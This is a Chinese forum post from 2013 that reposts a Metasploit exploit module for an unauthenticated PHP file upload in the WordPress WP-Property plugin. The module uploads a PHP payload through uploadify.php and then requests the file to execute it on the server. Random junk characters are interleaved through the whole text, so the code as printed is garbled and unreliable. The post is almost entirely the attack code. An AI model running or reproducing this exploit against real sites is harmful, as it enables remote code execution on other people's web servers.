WordPress WP-Property PHP 文件上传漏洞
7 Q# V' I; X' G+ n4 U- I
* y5 a8 R9 w) G) k* {2 A8 r ## # This file is part of the Metasploit Framework and may be subject to9 d1 a6 D' W) s
2 b" I2 L$ L0 |$ ^# redistribution and commercial restrictions. Please see the Metasploit0 O# N, }6 b" G, g
' S) @, n1 C; M5 d( h
# Framework web site for more information on licensing and terms of use.
( _% C C4 V J7 F" \
* Y+ N' Y _# o5 k( J# http://metasploit.com/framework/ ##
2 T& @' {7 e. `2 _6 Q; c; u0 r' k5 M$ F% d8 K
/ B5 \+ `8 p1 F
. ?. R% B9 _7 L& w
: ~0 _! D! v. e- l, t
) M. ?! V; P. g; ?, t8 G+ ?/ Urequire 'msf/core'8 Y2 N9 ~; R3 A1 B7 } u5 n
require 'msf/core/exploit/php_exe'3 S# G9 \1 W' L
2 N" V' k6 z' n8 J8 w: lclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',. V9 Z/ t1 ?) P `
'Description' => %q{
& H7 |# \' z8 s8 F2 N+ f, RThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 b; |- r( M2 f4 `[
5 [, j3 E1 B3 [ f$ Q, G$ H'Sammy FORGIT', # initial discovery
2 _3 W* l+ E# t5 W+ q0 d2 b. v1 w$ h'James Fitts <fitts.james[at]gmail.com>' # metasploit module) h/ P F4 l5 f# |4 l7 L6 D! I
],
. {: v0 P2 N+ s! J6 x'License' => MSF_LICENSE,# k! {6 j6 x2 I- S, L
'References' =>
3 s2 k0 M- ^% ?+ t& y" ][
) L [) Z$ J" X/ C+ B( C8 A. K[ 'OSVDB', '82656' ],% V; R5 @+ |/ a. O) d" M) e$ [2 K
[ 'BID', '53787' ],7 C2 J: Y$ S1 h9 g
[ 'EDB', '18987'],
9 U2 Y- l. n: @! G; A2 z5 S[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
% E `! q7 F; { v* ^],
! H2 N' \* F+ m; a R. z$ Y'Payload' =>; S* f( O. }" {- o
{! y" D; D: a6 V3 l# X8 A. N
'BadChars' => "\x00",% V0 K4 s6 F# }7 W1 G2 s7 U
},
5 z. v! F+ m: }3 J# T# K( {' |& y2 x'Platform' => 'php',! e- Q% y1 e, E
'Arch' => ARCH_PHP,/ z( _7 y$ h O1 q1 G Y5 h
'Targets' =>) } W+ {' {+ u7 T
[/ `6 S" L) Y' v$ a+ G) U5 x
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],8 \/ d- F/ B2 r% s8 _
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]! Z9 I+ x1 l3 ?
],. g2 M4 ~. a+ d9 V8 t" e, S
'DefaultTarget' => 0,
) Z; R; `: o, Z# {1 [: _'DisclosureDate' => 'Mar 26 2012'))3 }9 r2 ?3 j: p4 ]
! f, {- K f% ^
register_options(/ Z) c7 T/ x7 }3 ]
[6 Y1 a4 q7 s& L5 T
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])# V' M$ F, r+ T. b+ T
], self.class)8 Y g9 b2 z7 ^3 [
end
" g6 E' I3 L" Y. k+ \5 `& i" q0 H' |0 x0 j0 ]3 j/ L+ n1 `
def check
4 V, [' t6 X9 y/ O: G) X/ Ruri = target_uri.path+ W/ `! R5 e8 W$ p- t3 t
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
$ t3 g' M+ Y' _4 h! c+ _'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"0 Z7 s7 n6 [( m, z$ T$ g/ z6 I# [- r
})3 G5 ]- [! j* F* O) B9 V. E; O
1 u& x8 N3 V! k4 c6 }
if not res or res.code != 200 k5 @7 R: S+ \ D" i! e8 L' R
return Exploit::CheckCode::Unknown
6 {% {& @ N/ l4 g9 gend+ ^8 L/ c: l5 G
: F- r3 _/ c6 i7 X! G7 ~return Exploit::CheckCode::Appears
5 p2 k+ m* z9 N* q+ h1 g6 cend
1 U9 _, R: M. p7 Y" p* s' h: P. o' o5 F* }
def exploit
, u. z$ \+ {8 P- J; _uri = target_uri.path9 m& M( z9 [; o; B' O: Y: S
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)! b, i1 N/ n/ m/ e1 g% A( q
, M. v$ ^ u2 l7 L9 M: u( n) F' hdata = Rex::MIME::Message.new
) R) `. ^. R4 u8 Vdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")9 B. u. Q3 F; }" n) K
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""), n: z: S0 b* T9 M* _
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'). G+ s5 J: m* r. I4 W; R: J# P6 h
) |/ a' [. ^- G g$ Z: v ?
print_status("#{peer} - Uploading payload #{@payload_name}")
: X z) F8 k$ D3 `8 P& ]res = send_request_cgi({
! y0 M; d/ H! l- x+ ^" C'method' => 'POST',& K/ j( H' U# f' c
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", l0 u3 q6 z, f# P! Q0 Q% F& V
'ctype' => "multipart/form-data; boundary=#{data.bound}",
) t) q8 o6 o4 k" ^5 g! C'data' => post_data
, N1 r7 ?" f t2 A- v$ G E})2 S$ U' t+ \% g. ]6 `% b: t) x. |
' ~# A) h, I" H8 n" o. ^
if not res or res.code != 200 or res.body !~ /#{@payload_name}/ g& x7 K( u8 C N2 E1 D
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")+ H. A3 Z+ i) m- V$ d
end! v8 Z; ^# I! ?. S- U# l/ f# f, f; e
$ ^4 Q# g9 L9 x0 t, V" W
upload_uri = res.body1 D/ {# j( j+ W+ x) q
d ^* h/ O$ f" z! `print_status("#{peer} - Executing payload #{@payload_name}")- y2 p" C. g) G/ |; v6 e" n
res = send_request_raw({1 v6 R" H" I& ^4 m+ Q
'uri' => upload_uri,( N9 t# v' i' _& E5 |( S
'method' => 'GET'0 H, p) f9 g- A: ^ C- u
})( f- s% w+ i; J) ~( i4 V# I8 a
end" G8 t5 {& j2 ]2 b' ?* N
end
2 r* Z8 S! x1 E0 h+ y2 K/ s- Q; W. a# Y- o
不要问我这写的是什么 怎么利用 我是说msf.
% [2 k" j- H) e& [- B, z8 l$ }
8 |$ b! R2 z2 @$ s |
发表于 2013-1-4 19:51:30
收藏
支持
反对